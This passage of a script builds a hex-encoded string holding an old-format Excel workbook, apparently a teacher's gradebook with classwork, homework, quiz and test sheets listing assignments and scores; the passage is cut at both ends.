0"\r\nwD+="04d00103d0000331000004f1014000200020000000000000000000000000000000000261002"\r\nwD+="000a0051100800000100000000000034100000241002000300251020000202010000000000e"\r\nwD+="affffffcbffffff0000000000000000b1004d00103d0000331000004f101400020002000000"\r\nwD+="0000000000000000000000000000261002000b0051100800000100000000000034100000461"\r\nwD+="00200010041101200000062010000e0030000820b000005060000331000004f101400020002"\r\nwD+="002c000000ed020000b90c0000490c00001d101200000000000000000000000000000000000"\r\nwD+="000331000002010080001aaaaaa010001006210120000000000010000000100000000000000"\r\nwD+="ef001e101e000200030100000000000000000000000000000000000000000b004d005a00261"\r\nwD+="002000900341000001d101200010000000000000000000000000000000000331000001f102a"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000001f011e101e0002000301000000000000000000000000000000000000000023004d00"\r\nwD+="000021100200010007100c00000000000000ffff09004d00341000003510000032100400000"\r\nwD+="003003310000007100c008080800000000000000017000a101000c0c0c00000000000010000"\r\nwD+="0016004f0034100000141014000000000000000000000000000000000000000000331000001"\r\nwD+="8100200010022100a0000000000000000000f0015101400150d00001a0600007a0200009101"\r\nwD+="000003011f00331000004f10140005000200150d00001a06000000000000000000002510200"\r\nwD+="00202010000000000eaffffffcbffffff0000000000000000b1004d0030090000331000004f"\r\nwD+="101400020002000000000000000000000000000000000051100800000100000000000034100"\r\nwD+="000341000003410000034100000251020000202010000000000a9060000540000004a020000"\r\nwD+="e501000081004d0080300000331000004f101400020002000000000000000000860000002e0"\r\nwD+="00000261002000a005110080000010000000000000d10180000000a0143006c006100730073"\r\nwD+="0077006f0072006b00200027100600010000000000341000003410000000020e00000000000"\r\nwD+="90000000000010000006510020002000402370000000000000017000163006c006100730073"\r\nwD+="0077006f0072006b000a0038002e003600200038002e0037002000730068006500650074000"\r\nwD+="4022f0001000000000013000163006c0061007300730077006f0072006b000a007700610072"\r\nwD+="006d00750070002000230035000402350002000000000016000163006c00610073007300770"\r\nwD+="06f0072006b000a0063006f006f006c00200064006f0077006e0020002300350004023d0003"\r\nwD+="00000000001a000163006c0061007300730077006f0072006b000a007700650065006b006c0"\r\nwD+="07900200072006500760069006500770020003100350004023d000400000000001a00016300"\r\nwD+="6c0061007300730077006f0072006b000a007700650065006b006c007900200072006500760"\r\nwD+="069006500770020003100360004023d000500000000001a000163006c006100730073007700"\r\nwD+="6f0072006b000a007700650065006b006c00790020007200650076006900650077002000310"\r\nwD+="034000402370006000000000017000163006c0061007300730077006f0072006b000a005400"\r\nwD+="72006900670020005400770069007300740065007200200004023d000700000000001a00016"\r\nwD+="3006c0061007300730077006f0072006b000a007700650065006b006c007900200072006500"\r\nwD+="76006900650077002000310037000402350008000000000016000163006c006100730073007"\r\nwD+="7006f0072006b000a006c006f0063007500730020007000610063006b006500740065100200"\r\nwD+="010003020e000000000000000000000000004b4003020e00010000000000000000000000344"\r\nwD+="003020e00020000000000000000000000494003020e00030000000000cdcccccccccc574003"\r\nwD+="020e00040000000000000000000000344003020e00050000000000000000000000594003020"\r\nwD+="e00060000000000000000000000544003020e00070000000000000000000000000003020e00"\r\nwD+="08000000000000000000008056406510020003000a000000ec0066000f0004f066000000a20"\r\nwD+="c0af00800000003040000000a000063000bf0240000008000784a36018b0002000000bf0008"\r\nwD+="000800810141000008c0010c000008ff0108000800000010f01200000000000800d2001600a"\r\nwD+="6000c0010001f00d300000011f0000000005d001a0015001200060003001160784a3601d413"\r\nwD+="92010000000000000000ec00080000000df000000000b601120012020000000000000000260"\r\nwD+="01000000000003c00270000576861742074797065206f66206772617068206c6f6f6b732062"\r\nwD+="65737420616e64207768793f3c00100000001200e90011002600000000000000ec009c000f0"\r\nwD+="004f09c00000002030af00800000004040000000a0000f3000bf05a0000008000c84a360185"\r\nwD+="00010000008b0002000000bf0008000a0047011ca8ffff4801fb340000490125ccffff4a01c"\r\nwD+="60b00004c01c60b00004d011ca8ffff4e01fb340000810141000008c0010c000008ff010800"\r\nwD+="08007f0304000c00000010f01200000000000a0070010100e2000b0070031000f100000011f"\r\nwD+="0000000005d001a00150012001e0004001160c84a3601e01492010000000000000000ec0008"\r\nwD+="0000000df000000000b60112001202000000000000000024001000000000003c00250000225"\r\nwD+="041535445205350454349414c22202d2d56414c55455320414e4420464f524d4154533c0010"\r\nwD+="0000001200120111002400000000000000ec0018001f0005f010000000000017f0080000000"\r\nwD+="2000000040400003e021200b600100000004000000000000000000000001d000f0003040003"\r\nwD+="0000000100040004000303ef000600050037000000670817006708000000000000000000000"\r\nwD+="20001ffffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218"\r\nwD+="0000000000010000002b0000005b4000007e4d0000004e00000d00020001000c00020064000"\r\nwD+="f000200010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00"\r\nwD+="02000000820002000100800008000000000000000000250204000000ff0081000200c104140"\r\nwD+="0000015000000830002000000840002000000a10022000000ff000100010001000400020001"\r\nwD+="ff000000000000e03f000000000000e03f524d120002000100dd00020001006300020001005"\r\nwD+="500020008007d000c0000000000241b0f00020004007d000c00010001006d130f0003000400"\r\nwD+="7d000c0008000800b60a0f00060004009b0000009d00020001009e002100000004000602c85"\r\nwD+="a3601080100000000000000000000000000686f6d65776f726b00020e00010000002b000000"\r\nwD+="00000f00000008021000010000000900ff000000000000010f0008021000020000000900ff0"\r\nwD+="00000000020010f0008021000030000000900ff000000000000010f00080210000400000009"\r\nwD+="00ff000000000020010f0008021000050000000900ff000000000020010f000802100006000"\r\nwD+="0000900ff000000000000010f0008021000070000000900ff000000000000010f0008021000"\r\nwD+="080000000900ff000000000020010f0008021000090000000900ff000000000020010f00080"\r\nwD+="210000a0000000900ff000000000020010f00080210000b0000000900ff000000000020010f"\r\nwD+="00080210000c0000000900ff000000000000010f00080210000d0000000900ff00000000002"\r\nwD+="0010f00080210000e0000000900ff000000000020010f00080210000f0000000900ff000000"\r\nwD+="000020010f0008021000100000000a00ff000000000020010f0008021000110000000a00ff0"\r\nwD+="00000000020010f0008021000120000000a00ff000000000000010f0008021000130000000a"\r\nwD+="00ff000000000000010f0008021000140000000a00ff000000000000010f000802100015000"\r\nwD+="0000a00ff000000000020010f0008021000160000000a00ff000000000020010f0008021000"\r\nwD+="170000000a00ff000000000000010f0008021000180000000a00ff000000000000010f00080"\r\nwD+="21000190000000a00ff000000000020010f00080210001a0000000a00ff000000000020010f"\r\nwD+="00080210001b0000000a00ff000000000020010f00080210001c0000000a00ff00000000000"\r\nwD+="0010f00080210001d0000000a00ff000000000020010f00080210001e0000000a00ff000000"\r\nwD+="000000010f00080210001f0000000a00ff000000000020010f00fd000a00010000000f00000"\r\nwD+="00000fd000a00010001000f0001000000fd000a00010002000f0002000000fd000a00010003"\r\nwD+="000f0047000000fd000a00010004000f0032000000fd000a00010005000f004c000000fd000"\r\nwD+="a00010006000f004d000000fd000a00010007000f004e000000fd000a00020000000f002100"\r\nwD+="0000fd000a00020001000f00220000007e020a00020002000f000000594003020e000200080"\r\nwD+="01700577cc5577cc53240fd000a00030000000f0003000000fd000a00030001000f00090000"\r\nwD+="007e020a00030002000f0000405940060051000300030026003c25c85382fc50400000a8073"\r\nwD+="7fd3b0024030002c024060002c024070002c0240c0002c024120002c024130002c024140002"\r\nwD+="c024170002c024180002c0241c0002c0241e0002c0420b050006005a000300040025009a999"\r\nwD+="99999d953400000130008ff440024030002c024060002c0250600070002c002c024060002c0"\r\nwD+="240c0002c024130002c024120002c024140002c024170002c024180002c0241c0002c0241e0"\r\nwD+="002c0420ce30006005100030005002500a3554c5ac5949f400000030004ff3b0024030002c0"\r\nwD+="24060002c024070002c0240c0002c024120002c024130002c024140002c024170002c024180"\r\nwD+="002c0241c0002c0241e0002c0420b2e000600510003000600250040bc8129957a4640000003"\r\nwD+="0005ff3b0024030002c024060002c024070002c0240c0002c024130002c024120002c024140"\r\nwD+="002c024170002c024180002c0241c0002c0241e0002c0420b0c00060028000300070025008a"\r\nwD+="ddf0a40f87e73f0000030006ff120044030002c044030003c0041544030006c006fd000a000"\r\nwD+="30008001c0029000000fd000a00040000000f0004000000fd000a00040001000f000a000000"\r\nwD+="7e020a00040002000f000000594003020e00040008001d0014b742712b145140fd000a00050"\r\nwD+="000000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd"\r\nwD+="000a00050008001c0029000000fd000a00060000000f0006000000fd000a00060001000f000"\r\nwD+="9000000bd001200060002000f0000c050400f0000005140030003020e00060006000f004304"\r\nwD+="1c42957a464006002800060007000f0037f4c8e6e7c696bf0000030007ff120044060002c04"\r\nwD+="4060003c0041544060006c0067e020a00060008001d0000805140fd000a00070000000f0007"\r\nwD+="000000fd000a00070001000f0009000000bd001200070002000f000104bf400f00000051400"\r\nwD+="30003020e00070006000f0043041c42957a464006002800070007000f006994d53a853ad03f"\r\nwD+="0000060007ff120044070002c044070003c0041544070006c006fd000a00080000000f00080"\r\nwD+="00000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a00090000"\r\nwD+="000f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000"\r\nwD+="a000a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f000080"\r\nwD+="5140fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b00020"\r\nwD+="00f0000005940fd000a000c0000000f000f000000fd000a000c0001000f0009000000bd0012"\r\nwD+="000c0002000f00000059400f0000005140030003020e000c0006000f0043041c42957a46400"\r\nwD+="60028000c0007000f0037f4c8e6e7c6e63f0000070007ff1200440c0002c0440c0003c00415"\r\nwD+="440c0006c006fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a0"\r\nwD+="00d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a0000"\r\nwD+="007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000"\r\nwD+="f000a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a00"\r\nwD+="100001000f000a0000007e020a00100002000f0000003440fd000a00110000000f001400000"\r\nwD+="0fd000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f"\r\nwD+="0015000000fd000a00120001000f0009000000bd001200120002000f00000059400f0000005"\r\nwD+="140030003020e00120006000f0043041c42957a464006002800120007000f0037f4c8e6e7c6"\r\nwD+="e63f00000c0007ff120044120002c044120003c0041544120006c006fd000a0012000800200"\r\nwD+="026000000fd000a001200090020002a000000fd000a00130000000f0016000000fd000a0013"\r\nwD+="0001000f0009000000bd001200130002000f00000000000f0000005140030003020e0013000"\r\nwD+="6000f0043041c42957a464006002800130007000f007a8335655633f8bf0000120007ff1200"\r\nwD+="44130002c044130003c0041544130006c006060023001300080027006766666666663440000"\r\nwD+="0030003ff0d001fc3f5285c8fc2e53f1e1e00057e020a0013000900200000003e40fd000a00"\r\nwD+="140000000f0017000000fd000a00140001000f0009000000bd001200140002000f000000000"\r\nwD+="00f0000005140030003020e00140006000f0043041c42957a464006002800140007000f007a"\r\nwD+="8335655633f8bf0000130007ff120044140002c044140003c0041544140006c006fd000a001"\r\nwD+="50000000f0018000000fd000a00150001000f000a0000007e020a00150002000f0000005940"\r\nwD+="fd000a00160000000f0019000000fd000a00160001000f000a0000007e020a00160002000f0"\r\nwD+="000005440fd000a00170000000f001a000000fd000a00170001000f0009000000bd00120017"\r\nwD+="0002000f00000059400f0000005140030003020e00170006000f0043041c42957a464006002"\r\nwD+="800170007000f0037f4c8e6e7c6e63f0000140007ff120044170002c044170003c004154417"\r\nwD+="0006c006fd000a00180000000f001b000000fd000a00180001000f0009000000bd001200180"\r\nwD+="002000f00000000000f0000005140030003020e00180006000f0043041c42957a4640060028"\r\nwD+="00180007000f007a8335655633f8bf0000170007ff120044180002c044180003c0041544180"\r\nwD+="006c006fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900"\r\nwD+="02000f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e0"\r\nwD+="20a001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c"\r\nwD+="0000007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000"\r\nwD+="1000f0009000000bd0012001c0002000f00000059400f0000005140030003020e001c000600"\r\nwD+="0f0043041c42957a4640060028001c0007000f0037f4c8e6e7c6e63f0000180007ff1200441"\r\nwD+="c0002c0441c0003c00415441c0006c006fd000a001d0000000f001f000000fd000a001d0001"\r\nwD+="000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000fd000"\r\nwD+="a001e0001000f0009000000bd0012001e0002000f00000059400f0000005140030003020e00"\r\nwD+="1e0006000f0043041c42957a4640060028001e0007000f0037f4c8e6e7c6e63f00001c0007f"\r\nwD+="e1200441e0002c0441e0003c00415441e0006c006fd000a001f0000000f001e000000fd000a"\r\nwD+="001f0001000f000a0000007e020a001f0002000f0000805640d7004200ac0c0000580270003"\r\nwD+="c00c1013c0038007e0070002a002a002a002a0070002a002a002a002a002a008c00a5007000"\r\nwD+="2a002a00700070002a002a002a0070002a0070000802100029000e000f00ff0000000000000"\r\nwD+="10f00080210002a000e000f00ff000000000000010f000102060029000e001700010206002a"\r\nwD+="000e001700d70008003c00000014000a00c2011800110003000100090803000080040013000"\r\nwD+="2000903080007feec00aa000f0002f014010000300008f00800000003000000030800000f00"\r\nwD+="03f0fc0000000f0004f028000000010009f0100000000000000000000000000000000000000"\r\nwD+="002000af00800000000080000050000000f0004f052000000920c0af0080000000108000000"\r\nwD+="0a000043000bf0180000007f0004010401bf0008000800ff0100000800bf030000020000001"\r\nwD+="0f012000000010001000000010000000200000002000000000011f0000000005d0046001500"\r\nwD+="120014000100012100000000ac199201000000000c001400000000000000000000000100080"\r\nwD+="00000100000001300ee1f000008000500010300000a001400570000000000ec0072000f0004"\r\nwD+="f06a000000920c0af00800000003080000000a000083000bf0300000007f0004010401bf000"\r\nwD+="800080081014e00000883014d000008bf0110001000c0014d000008ff01080008003f020000"\r\nwD+="0200000010f0120000000000000097002200c4000d00b0013b009700000011f0000000005d0"\r\nwD+="01a001500120005000300116000000000781a920100000000000000000908100000062000e2"\r\nwD+="28cd07c9c00000060200001400000015000000830002000000840002000000a100220000001"\r\nwD+="20001000100010004000000781a000000000000e03f000000000000e03f7f00330002000300"\r\nwD+="60100a004c1d4812dc0001000c0060100a008115e60ac80000000d0060100a008115e60ac80"\r\nwD+="001000e00120002000100011002000000021010000000000000000000e8bfa60200403d0133"\r\nwD+="100000a00004000100010064100800000001000000010032100400000002003310000007100"\r\nwD+="c00000000000000ffff09004d000a101000ffffff0000000000010001004e004d0034100000"\r\nwD+="03100c00030001000b000b00010000003310000051100f0000020000000007003a010001000"\r\nwD+="2000d100e000000050147005200410044004500511013000102000000000b003b010002001e"\r\nwD+="0002000200511013000202000000000b003b010002001e00000001005110080003010000000"\r\nwD+="0000006100800ffff000000000000331000005f100200000034100000451002000000341000"\r\nwD+="00441004001a000000241002000200251020000202010000000000eaffffffd0ffffff00000"\r\nwD+="00000000000b1004d00103d0000331000004f10140002000200000000000000000000000000"\r\nwD+="00000000261002000d005110080000010000000000003410000024100200030025102000020"\r\nwD+="2010000000000eaffffffd0ffffff0000000000000000b1004d00103d0000331000004f1014"\r\nwD+="000200020000000000000000000000000000000000261002000e00511008000001000000000"\r\nwD+="00034100000461002000100411012000000a3020000f9030000200a0000bb04000033100000"\r\nwD+="4f101400020002002d000000fb020000960c0000440c00001d1012000000000000000000000"\r\nwD+="000000000000000003310000020100800010001000100010062101200000000000100000001"\r\nwD+="00000000000000ef001e101e000200030100000000000000000000000000000000000000000"\r\nwD+="3004d002900261002000c00341000001d101200010000000000000000000000000000000000"\r\nwD+="331000001f102a0000000000000000000000000000000000000000000000000000000000000"\r\nwD+="0000000000000000000001f011e101e00020003010000000000000000000000000000000000"\r\nwD+="00000023004d00000021100200010007100c00000000000000ffff09004d003410000035100"\r\nwD+="00032100400000003003310000007100c008080800000000000000017000a101000c0c0c000"\r\nwD+="000000000100000016004f00341000001410140000000000000000000000000000000000000"\r\nwD+="00000331000001710060000009600000022100a0000000000000000000f0015101400f40c00"\r\nwD+="00b20600009a0200009701000003011f00331000004f10140005000200f40c0000af0600000"\r\nwD+="000000000000000251020000202010000000000eaffffffd0ffffff0000000000000000b100"\r\nwD+="4d0030090000331000004f10140002000200000000000000000000000000000000005110080"\r\nwD+="000010000000000003410000034100000341000003410000025102000020201000000000095"\r\nwD+="0600006b000000a3020000f801000081004d008a300000331000004f1014000200020018000"\r\nwD+="0001a0000009700000034000000261002000d005110080000010000000000000d1014000000"\r\nwD+="080148006f006d00650077006f0072006b00271006000100000000003410000034100000000"\r\nwD+="20e00000000000b000000000001000000651002000200040235000000000000001600013100"\r\nwD+="2f00320039002c00200033003000200050002e0020003400390032002c00200050002000350"\r\nwD+="03000320004022f0001000000000013000131002f0033003100200032002f00310020004300"\r\nwD+="68002000540065007300740020004100200004022d0002000000000012000132002f0031002"\r\nwD+="c003200200070002e00200035003100360020002d0020003500310038000402270003000000"\r\nwD+="00000f0001700072006f006a0065006300740020006f00750074006c0069006e00650004023"\r\nwD+="10004000000000014000132002f0036002c0020003700200070002e00200037003900390020"\r\nwD+="00230031002d003200350020000402290005000000000010000170002e00200035003300310"\r\nwD+="02000350033003800200032002f0038002c0039000402370006000000000017000139002e00"\r\nwD+="3300200039002e00340020007000790074006800610067006f007200650061006e002000740"\r\nwD+="068006d0004022f0007000000000013000132002f00320037002c003200380020004d006100"\r\nwD+="7400680020004100200074006500730074000402330008000000000015000133002f0031002"\r\nwD+="c003200200077006b007300680074002000310030002e0031002f00310030002e0036000402"\r\nwD+="21000900000000000c00016c006f0063007500730020007000610063006b006500740004024"\r\nwD+="7000a00000000001f000133002f0037002c0038002000310031002e00310020006e006f0074"\r\nwD+="0065007300200061006e0064002000700072006100630020004100200073006800740065100"\r\nwD+="200010003020e00000000000000000000000040594003020e000100000000000000000000c0"\r\nwD+="504003020e000200000000009a99999999d9534003020e00030000000000000000000000594"\r\nwD+="003020e00040000000000000000000000594003020e00050000000000000000000000000003"\r\nwD+="020e00060000000000000000000000000003020e00070000000000000000000000594003020"\r\nwD+="e00080000000000000000000000000003020e00090000000000000000000000594003020e00"\r\nwD+="0a000000000000000000000059406510020003000a0000003e021200b600030000004000000"\r\nwD+="000000000000000001d000f00030300030000000100030003000303ef000600050037000000"\r\nwD+="67081700670800000000000000000000020001ffffffff004000000a0000000908100000061"\r\nwD+="000e228cd07c9c00000060200000b021800000000000100000025000000d05800004d610000"\r\nwD+="076200000d00020001000c00020064000f000200010011000200000010000800fca9f1d24d6"\r\nwD+="2503f5f00020001002a00020000002b00020000008200020001008000080000000000000000"\r\nwD+="00250204000000ff0081000200c1041400000015000000830002000000840002000000a1002"\r\nwD+="2000000ff000100010001000400020001ff000000000000e03f000000000000e03f006f5500"\r\nwD+="020008007d000c0000000000db1f0f00020004007d000c00010001006d0b0f00020004009b0"\r\nwD+="000009d00020001009e001d00000004000602d85a3601040100000000000000000000000000"\r\nwD+="7175697a00020e00010000002500000000000900000008021000010000000900ff000000000"\r\nwD+="000010f0008021000020000000900ff000000000020010f0008021000030000000900ff0000"\r\nwD+="00000020010f0008021000040000000900ff000000000020010f0008021000050000000900f"\r\nwD+="f000000000000010f0008021000060000000900ff000000000020010f000802100007000000"\r\nwD+="0900ff000000000020010f0008021000080000000900ff000000000020010f0008021000090"\r\nwD+="000000900ff000000000000010f00080210000a0000000900ff000000000020010f00080210"\r\nwD+="000b0000000900ff000000000000010f00080210000c0000000900ff000000000020010f000"\r\nwD+="80210000d0000000900ff000000000020010f00080210000e0000000900ff00000000002001"\r\nwD+="0f00080210000f0000000900ff000000000020010f0008021000100000000300ff000000000"\r\nwD+="020010f0008021000110000000300ff000000000020010f0008021000120000000300ff0000"\r\nwD+="00000020010f0008021000130000000300ff000000000020010f0008021000140000000300f"\r\nwD+="f000000000020010f0008021000150000000300ff000000000020010f000802100016000000"\r\nwD+="0300ff000000000020010f0008021000170000000300ff000000000020010f0008021000180"\r\nwD+="000000300ff000000000020010f0008021000190000000300ff000000000020010f00080210"\r\nwD+="001a0000000300ff000000000020010f00080210001b0000000300ff000000000020010f000"\r\nwD+="80210001c0000000300ff000000000020010f00080210001d0000000300ff00000000000001"\r\nwD+="0f00080210001e0000000300ff000000000020010f00080210001f0000000300ff000000000"\r\nwD+="020010f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a0001"\r\nwD+="0002000f0002000000fd000a00010003000f0047000000fd000a00010004000f0032000000f"\r\nwD+="d000a00010005000f0048000000fd000a00010006000f004d000000fd000a00010007000f00"\r\nwD+="4e000000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a00020"\r\nwD+="001000f00220000007e020a00020002000f0000005940fd000a00030000000f0003000000fd"\r\nwD+="000a00030001000f00090000007e020a00030002000f0000005940fd000a00040000000f000"\r\nwD+="4000000fd000a00040001000f000a0000007e020a00040002000f0000005940fd000a000500"\r\nwD+="00000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940060"\r\nwD+="02e00050003000f000000000000e050400000b80b37fc180024050002c024090002c0240b00"\r\nwD+="02c0241d0002c042040500fd000a00060000000f0006000000fd000a00060001000f0009000"\r\nwD+="0007e020a00060002000f0000c0504003020e0006000700170014b742712b145140fd000a00"\r\nwD+="070000000f0007000000fd000a00070001000f00090000007e020a00070002000f000000444"\r\nwD+="0fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002000f"\r\nwD+="0000004940fd000a00090000000f000d000000fd000a00090001000f000b0000007e020a000"\r\nwD+="90002000f0000005440fd000a000a0000000f000e000000fd000a000a0001000f000c000000"\r\nwD+="7e020a000a0002000f0000805140fd000a000b0000000f0011000000fd000a000b0001000f0"\r\nwD+="00b0000007e020a000b0002000f0000005940fd000a000c0000000f000f000000fd000a000c"\r\nwD+="0001000f00090000007e020a000c0002000f0000005940fd000a000d0000000f0023000000f"\r\nwD+="d000a000d0001000f000a0000007e020a000d0002000f0000003440fd000a000e0000000f00"\r\nwD+="10000000fd000a000e0001000f000a0000007e020a000e0002000f0000004940fd000a000f0"\r\nwD+="000000f0012000000fd000a000f0001000f000a0000007e020a000f0002000f0000004940fd"\r\nwD+="000a00100000000f0013000000fd000a00100001000f000a0000007e020a00100002000f000"\r\nwD+="0003440fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a001100"\r\nwD+="02000f0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e0"\r\nwD+="20a00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009"\r\nwD+="0000007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000"\r\nwD+="1000f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd00"\r\nwD+="0a00150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190"\r\nwD+="00000fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000"\r\nwD+="000f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000"\r\nwD+="a00180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000"\r\nwD+="0000fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900020"\r\nwD+="00f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"\r\nwD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"\r\nwD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"\r\nwD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"\r\nwD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"\r\nwD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"\r\nwD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d7004200"\r\nwD+="1a08000058027e002a002a002a005c003c002a002a002a002a002a002a002a002a002a002a0"\r\nwD+="02a002a002a002a002a002a002a002a002a002a002a002a002a002a00080210002200000007"\r\nwD+="00ff000000000000010f0008021000230000000700ff000000000000010f000802100024000"\r\nwD+="0000700ff000000000000010f00fd000a00220002000f0037000000fd000a00220006000f00"\r\nwD+="2a0000007e020a00230006000f0000003440fd000a0024000000210038000000d7000a00740"\r\nwD+="0000028001c000e00c2010c00030005000300090303003800ec00aa000f0002f03a01000040"\r\nwD+="0008f00800000003000000020c00000f0003f00a0100000f0004f028000000010009f010000"\r\nwD+="0000000000000000000000000000000000002000af008000000000c0000050000000f0004f0"\r\nwD+="52000000920c0af008000000010c0000000a000043000bf0180000007f0004010401bf00080"\r\nwD+="00800ff0100000800bf0300000200000010f012000000010001000000010000000200000002"\r\nwD+="000000000011f0000000005d0046001500120014000100012100000000441d9201000000000"\r\nwD+="c00140000000000000000000000010008000000100000001300ee1f00000800070001030000"\r\nwD+="0a001400570000000000ec0078000f0004f078000000f2030af008000000020c0000000a000"\r\nwD+="093000bf0360000008000a86e36018500010000008b0002000000bf0008000a004701ae5900"\r\nwD+="004801cffaffff810141000008c001400000087f0300000c00000010f012000000000000005"\r\nwD+="2032300d300020090022700a600000011f0000000005d001a00150012001e0002001160a86e"\r\nwD+="3601a01d92010000000000000000ec00080000000df000000000b6011200120200000000000"\r\nwD+="0000022001000000000003c00230000496e73657274207765696768746564207175697a2061"\r\nwD+="76657261676520686572652e3c00100000001100c400110022000000ac9c3400ec0018001f0"\r\nwD+="005f010000000000017f00800000002000000020c00003e021200b600000000004000000000"\r\nwD+="000000000000001d000f00032700050000000100270027000505ef0006000500370000000a0"\r\nwD+="000000908100000061000e228cd07c9c00000060200000b0218000000000001000000270000"\r\nwD+="0027650000896d00005f6e00000d00020001000c00020064000f00020001001100020000001"\r\nwD+="0000800fca9f1d24d62503f5f00020001002a00020000002b00020000008200020001008000"\r\nwD+="08000000000000000000250204000000ff0081000200c104140000001500000083000200000"\r\nwD+="0840002000000a10022000000ff00010001000100040100050505000000000000e03f000000"\r\nwD+="000000e03f72655500020008007d000c0000000000db1f0f00020004017d000c00010001006"\r\nwD+="d0b0f00020004019b0000009d00020001009e001d00000004000602046e3601040100000000"\r\nwD+="0000000000000000007465737400020e0001000000270000000000080000000802100001000"\r\nwD+="0000800ff000000000000010f0008021000020000000800ff000000000020010f0008021000"\r\nwD+="030000000800ff000000000020010f0008021000040000000800ff000000000020010f00080"\r\nwD+="21000050000000800ff000000000020010f0008021000060000000800ff000000000020010f"\r\nwD+="0008021000070000000800ff000000000020010f0008021000080000000800ff00000000000"\r\nwD+="0010f0008021000090000000800ff000000000020010f00080210000a0000000800ff000000"\r\nwD+="000000010f00080210000b0000000800ff000000000020010f00080210000c0000000800ff0"\r\nwD+="00000000020010f00080210000d0000000800ff000000000020010f00080210000e00000008"\r\nwD+="00ff000000000020010f00080210000f0000000800ff000000000020010f000802100010000"\r\nwD+="0000300ff000000000020010f0008021000110000000300ff000000000000010f0008021000"\r\nwD+="120000000300ff000000000020010f0008021000130000000300ff000000000020010f00080"\r\nwD+="21000140000000300ff000000000020010f0008021000150000000300ff000000000020010f"\r\nwD+="0008021000160000000300ff000000000020010f0008021000170000000300ff00000000002"\r\nwD+="0010f0008021000180000000300ff000000000020010f0008021000190000000300ff000000"\r\nwD+="000020010f00080210001a0000000300ff000000000000010f00080210001b0000000300ff0"\r\nwD+="00000000000010f00080210001c0000000300ff000000000020010f00080210001d00000003"\r\nwD+="00ff000000000020010f00080210001e0000000300ff000000000020010f00080210001f000"\r\nwD+="0000300ff000000000020010f00fd000a00010000000f0000000000fd000a00010001000f00"\r\nwD+="01000000fd000a00010002000f0002000000fd000a00010003000f0047000000fd000a00010"\r\nwD+="004000f004f000000fd000a00010005000f0048000000fd000a00010006000f004d000000fd"\r\nwD+="000a00010007000f004e000000fd000a00020000000f0021000000fd000a00020001000f002"\r\nwD+="20000007e020a00020002000f0000005940fd000a00030000000f0003000000fd000a000300"\r\nwD+="01000f00090000007e020a00030002000f0000005940fd000a00040000000f0004000000fd0"\r\nwD+="00a00040001000f000a0000007e020a00040002000f0000005940fd000a00050000000f0005"\r\nwD+="000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd000a0006000"\r\nwD+="0000f0006000000fd000a00060001000f00090000007e020a00060002000f0000c05040fd00"\r\nwD+="0a00070000000f0007000000fd000a00070001000f00090000007e020a00070002000f00000"\r\nwD+="04440fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002"\r\nwD+="000f000000494006003300080003000f000000000000c051400000f00b37fc1d0024080002c"\r\nwD+="0240a0002c024110002c0241a0002c0241b0002c042050500fd000a00090000000f000d0000"\r\nwD+="00fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a000a0000000"\r\nwD+="f000e000000fd000a000a0001000f000c0000007e020a000a0002000f0000805140fd000a00"\r\nwD+="0b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000f000000594"\r\nwD+="0fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a000c0002000f"\r\nwD+="0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a000"\r\nwD+="d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a000000"\r\nwD+="7e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000f0"\r\nwD+="00a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a0010"\r\nwD+="0001000f000a0000007e020a00100002000f0000003440fd000a00110000000f0014000000f"\r\nwD+="d000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f00"\r\nwD+="15000000fd000a00120001000f00090000007e020a00120002000f0000005940fd000a00130"\r\nwD+="000000f0016000000fd000a00130001000f00090000007e020a00130002000f0000000000fd"\r\nwD+="000a00140000000f0017000000fd000a00140001000f00090000007e020a00140002000f000"\r\nwD+="0000000fd000a00150000000f0018000000fd000a00150001000f000a00